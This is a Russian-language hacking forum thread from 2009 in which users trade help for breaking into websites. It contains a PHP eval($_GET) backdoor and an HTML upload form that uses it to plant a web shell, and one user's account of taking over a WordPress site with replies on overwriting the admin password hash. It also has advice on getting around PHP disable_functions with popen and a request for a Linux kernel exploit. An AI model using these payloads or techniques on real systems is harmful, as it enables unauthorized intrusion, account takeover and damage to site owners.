29.11.2009, 02:09
|
|
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
С нами:
10018169
Репутация:
1680
|
|
Есть код:
<?php
eval($_GET[lol]);
?>
Как с помощью данного скрипта залить в папку TMP шелл используя только конструкцию $_FILE, без всяких url fopen и т.д...
Если где есть статейка с описанием способа, то покажите плз.
|
|
|
29.11.2009, 10:37
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
С нами:
9154406
Репутация:
2221
|
|
Сообщение от Nightmarе
Есть код:
<?php
eval($_GET[lol]);
?>
Как с помощью данного скрипта залить в папку TMP шелл используя только конструкцию $_FILE, без всяких url fopen и т.д...
Если где есть статейка с описанием способа, то покажите плз.
<form action="shell.php?lol=copy($_FILES[file][tmp_name], $_GET[bob]);&bob=./shell.php
" method="post" enctype="multipart/form-data">
<input type="file" name="file">
<input type="submit" value="upload">
</form>
Сообщение от LzD
[Google Source Code: Поиск багов в исходниках.]
Представлены ссылки для поиска бажного кода.
[1]- GoogleCodeSearch
[2]- GoogleSearch
http://cipher.org.uk/ideas/bugle/
Юзаем , ищем баги, хекоем 
В этом проекте и наш ettee участвовал 
Последний раз редактировалось Ctacok; 29.11.2009 в 10:39..
|
|
|
|
29.11.2009, 21:53
|
|
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
С нами:
10340793
Репутация:
66
|
|
залил шелл и получил доступ к wordpress. Теперь как мне изменит пасс админа типа:
$P$BVL7LPklZHMxVRnuBywE0fTV4d40SU.
надо заменит на свой но не знаю чем кодироват свой пасс для вордпресса
|
|
|
|
29.11.2009, 22:15
|
|
Участник форума
Регистрация: 10.06.2008
Сообщений: 201
С нами:
9431076
Репутация:
229
|
|
Сообщение от YuNi|[c
залил шелл и получил доступ к wordpress. Теперь как мне изменит пасс админа типа:
$P$BVL7LPklZHMxVRnuBywE0fTV4d40SU.
надо заменит на свой но не знаю чем кодироват свой пасс для вордпресса
Юзай PasswordsPro или поставь wp с нужным паролем на локалхост и вынь пароль через phpmyadmin
|
|
|
|
29.11.2009, 22:49
|
|
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
С нами:
10340793
Репутация:
66
|
|
Сообщение от nemaniak
Юзай PasswordsPro или поставь wp с нужным паролем на локалхост и вынь пароль через phpmyadmin
спс уже нашел вот http://onlinefunctions.net/wordpress-hash-generator.html
|
|
|
|
29.11.2009, 22:44
|
|
Постоянный
Регистрация: 20.11.2008
Сообщений: 406
С нами:
9196401
Репутация:
930
|
|
Сообщение от YuNi|[c
залил шелл и получил доступ к wordpress. Теперь как мне изменит пасс админа типа:
$P$BVL7LPklZHMxVRnuBywE0fTV4d40SU.
надо заменит на свой но не знаю чем кодироват свой пасс для вордпресса
http://www.insidepro.com/hashes.php?lang=rus --> MD5(Wordpress)
|
|
|
|
29.11.2009, 22:31
|
|
Новичок
Регистрация: 22.10.2009
Сообщений: 3
С нами:
8712511
Репутация:
1
|
|
disable_functions
rmdir, exec, unlink, shell_exec, escapeshellcmd, system, passthru, pcntl_exec, chmod, proc_close, proc_get_status, proc_nice, proc_open, proc_terminate
возможно ли выполнять системные команды, с такой конфигурацией php.ini? если да, то как? |
|
|
|
29.11.2009, 22:41
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами:
9410786
Репутация:
2731
|
|
Попробуй но не факт, т.к. это аналог shell_exec, вроде...
Последний раз редактировалось mailbrush; 29.11.2009 в 22:45..
|
|
|
|
29.11.2009, 22:44
|
|
Постоянный
Регистрация: 05.12.2006
Сообщений: 477
С нами:
10226672
Репутация:
441
|
|
Сообщение от mailbrush
Попробуй но не факт, т.к. это аналог shell_exec, вроде именно.
Поэтому попробуй заюзать popen.
|
|
|
|
30.11.2009, 11:23
|
|
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
С нами:
9567480
Репутация:
61
|
|
Подскажите, может кто-то видел эксплоит на
uname -a: Linux 2.6.27.12-170.2.5.fc10.i686 #1 SMP Wed Jan 21 02:09:37 EST 2009 i686
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
